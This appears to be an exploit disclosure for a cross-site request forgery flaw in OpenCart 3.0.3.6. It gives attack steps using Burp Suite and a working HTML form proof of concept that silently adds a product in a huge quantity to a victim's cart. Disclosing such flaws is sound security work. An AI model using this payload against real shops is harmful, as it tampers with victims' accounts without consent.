# Date: 12-11-2020
# Exploit Author: Mahendra Purbia {Mah3Sec}
# Vendor Homepage: https://www.opencart.com
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: OpenCart CMS - 3.0.3.6
# Tested on: Kali Linux
#Description:
This product have the functionality which let user to add the
wish-list of other user in to his/her cart. So, user A can add
products to his/her wish-list and can make his/her wish-list public
which let other users to see the wish-list. Now, as user B there is
a button of add to cart , when you click on it that public
wish-list will be added in to your cart.
#Additional Information:
well i found this vulnerability in Opencart based websites but they
not respond so i installed a lest version of Opencart CMS and
hosted on localhost with help of XAMP and then i exploited that
vulnerability.
Attack Vector:
1. create two accounts A(attacker) & B(victim)
2. login with A and add a product in cart and capture that
particular request in burpsuite.
3. Now change the quantity if want and then create a csrf poc of
that request.
4. Save it as .html and send it to victim. Now the product added to
victims cart.
#POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form
action="http://localhost/shop/index.php?route=checkout/cart/add"
method="POST">
<input type="hidden" name="product_id" value="43" />
<input type="hidden" name="quantity" value="10000000" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
